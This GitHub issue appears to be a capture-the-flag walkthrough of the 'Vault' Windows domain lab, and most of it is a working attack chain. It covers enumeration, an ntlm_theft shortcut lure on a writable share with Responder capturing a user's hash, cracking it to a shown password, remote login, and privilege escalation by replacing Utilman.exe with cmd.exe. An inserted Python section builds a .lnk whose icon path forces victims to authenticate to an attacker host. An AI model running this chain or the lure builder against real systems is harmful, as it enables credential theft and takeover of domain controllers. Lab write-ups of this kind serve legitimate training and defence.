WDavid404 / PG-Box

PG box walkthrough note

Vault (Hard, Windows AD, 2021) -- ntlm_theft, SeRestorePrivilege #58

Open WDavid404 opened 2 months ago

WDavid404 commented 2 months ago

Keypoints:

WDavid404 commented 2 months ago
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 125 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-08-10 14:41:57Z)
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 125
464/tcp   open  kpasswd5?     syn-ack ttl 125
593/tcp   open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 125
3268/tcp  open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 125
3389/tcp  open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
|   DNS_Domain_Name: vault.offsec
|   DNS_Computer_Name: DC.vault.offsec
5985/tcp  open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 125 .NET Message Framing
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49679/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49703/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49804/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC

53/tcp (DNS) --> no info

135/tcp (RPC)

rpcclient -U '' -N 192.168.208.172 --> no info

139/tcp, 445/tcp (SMB)

crackmapexec smb 192.168.208.172 --shares --> no info

smbmap -u null -p "" -H 192.168.208.172 -P 445 -r 2>&1 --> (screenshot)

smbclient //192.168.208.172/DocumentsShare --> no files exist, but we can upload files.

389/tcp (LDAP)

ldapsearch -H ldap://192.168.208.172 -x -s base namingcontexts -->

namingcontexts: DC=vault,DC=offsec
namingcontexts: CN=Configuration,DC=vault,DC=offsec
namingcontexts: CN=Schema,CN=Configuration,DC=vault,DC=offsec
namingcontexts: DC=DomainDnsZones,DC=vault,DC=offsec
namingcontexts: DC=ForestDnsZones,DC=vault,DC=offsec

ldapsearch -H ldap://192.168.208.172 -x -b"DC=vault,DC=offsec" --> no info

GetNPUsers.py vault.offsec/ -dc-ip 192.168.208.172 --> no info

Create a .lnk file and upload it to SMB

ntlm_theft: a tool for generating multiple types of NTLMv2 hash theft files.

python3 ntlm_theft.py -g lnk -s 192.168.45.205 -f test -->

Created: test/test.lnk (BROWSE TO FOLDER)
Generation Complete.

sudo responder -I tun0

Put test.lnk on the SMB share (screenshot)

Then we got the NTLMv2 hash (screenshot): anirudh::VAULT:f2ec... (truncated)

Crack the hash with john (screenshots) --> anirudh : SecureHM

evil-winrm -i 192.168.208.172 -u anirudh -p SecureHM (screenshot)
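How the .lnk lure above actually works, as an added example (not code from the note or from ntlm_theft): Explorer resolves a shortcut's IconLocation when it renders the folder listing, so a UNC icon path makes the victim's SMB client authenticate to the attacker host without anyone clicking the file. The writer below hand-rolls a minimal MS-SHLLINK file with only that field set; the reader walks the same structure back out, which doubles as a triage check for shortcuts dropped on a writable share. The attacker host 192.168.45.205 and the `\test\test.ico` path are assumptions taken from the `-s`/`-f` values in the note, not ntlm_theft's exact template.

```python
"""Minimal Shell Link (.lnk) writer/reader for an NTLM-theft icon lure (added example)."""
import struct

# MS-SHLLINK: ShellLinkHeader is 0x4C bytes, starts with HeaderSize then LinkCLSID.
HEADER_SIZE = 0x4C
SHELL_LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_IDLIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWNORMAL = 1


def build_lnk(icon_location: str) -> bytes:
    """Return a .lnk whose only payload is an IconLocation string."""
    flags = HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack(
        "<I16sIIQQQIIIHHII",
        HEADER_SIZE, SHELL_LINK_CLSID, flags,
        0,             # FileAttributes
        0, 0, 0,       # CreationTime, AccessTime, WriteTime (unused)
        0,             # FileSize
        0,             # IconIndex
        SW_SHOWNORMAL,
        0, 0, 0, 0,    # HotKey, Reserved1, Reserved2, Reserved3
    )
    # StringData item: CountCharacters (u16) followed by UTF-16LE chars, no terminator.
    icon = struct.pack("<H", len(icon_location)) + icon_location.encode("utf-16le")
    terminal_block = b"\x00\x00\x00\x00"  # empty ExtraData section
    return header + icon + terminal_block


def parse_icon_location(data: bytes):
    """Return the IconLocation of a .lnk, or None if absent/malformed."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data)[0] != HEADER_SIZE:
        return None
    if data[4:20] != SHELL_LINK_CLSID:
        return None
    flags = struct.unpack_from("<I", data, 20)[0]
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_IDLIST:          # IDListSize (u16) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                   # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    width = 2 if flags & IS_UNICODE else 1
    # StringData items appear in this fixed order, each only if its flag is set.
    for flag in (HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        raw = data[off:off + count * width]
        off += count * width
        if flag == HAS_ICON_LOCATION:
            return raw.decode("utf-16le" if width == 2 else "cp1252")
    return None


def is_unc_lure(data: bytes) -> bool:
    """True when the icon would be fetched from a remote host, i.e. the theft pattern."""
    loc = parse_icon_location(data)
    return loc is not None and loc.startswith("\\\\")


if __name__ == "__main__":
    # Assumed values from the note: attacker 192.168.45.205, file name "test".
    lure = build_lnk(r"\\192.168.45.205\test\test.ico")
    with open("test.lnk", "wb") as fh:
        fh.write(lure)
    print(parse_icon_location(lure), is_unc_lure(lure))
```

Drop the generated file on DocumentsShare with smbclient as in the note and keep Responder listening on the interface the UNC path points at. From the defender side, `is_unc_lure` over every `.lnk` on a writable share flags exactly the files that will make clients authenticate outbound.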

WDavid404 commented 2 months ago

PE

whoami /priv (screenshot) --> We can see "SeRestorePrivilege" is enabled. =====> We can use the same way as the "Heist" box (https://github.com/WDavid404/PG-Box/issues/57#issuecomment-2277967937)

get-childitem -path C:\Windows\System32\ -include utilman.exe -file -recurse -erroraction silentlycontinue --> utilman.exe is located in "C:\Windows\System32"

cd C:\Windows\System32
mv Utilman.exe Utilman-bk.exe
mv cmd.exe Utilman.exe
(screenshot)

[Kali] rdesktop $IP (screenshot)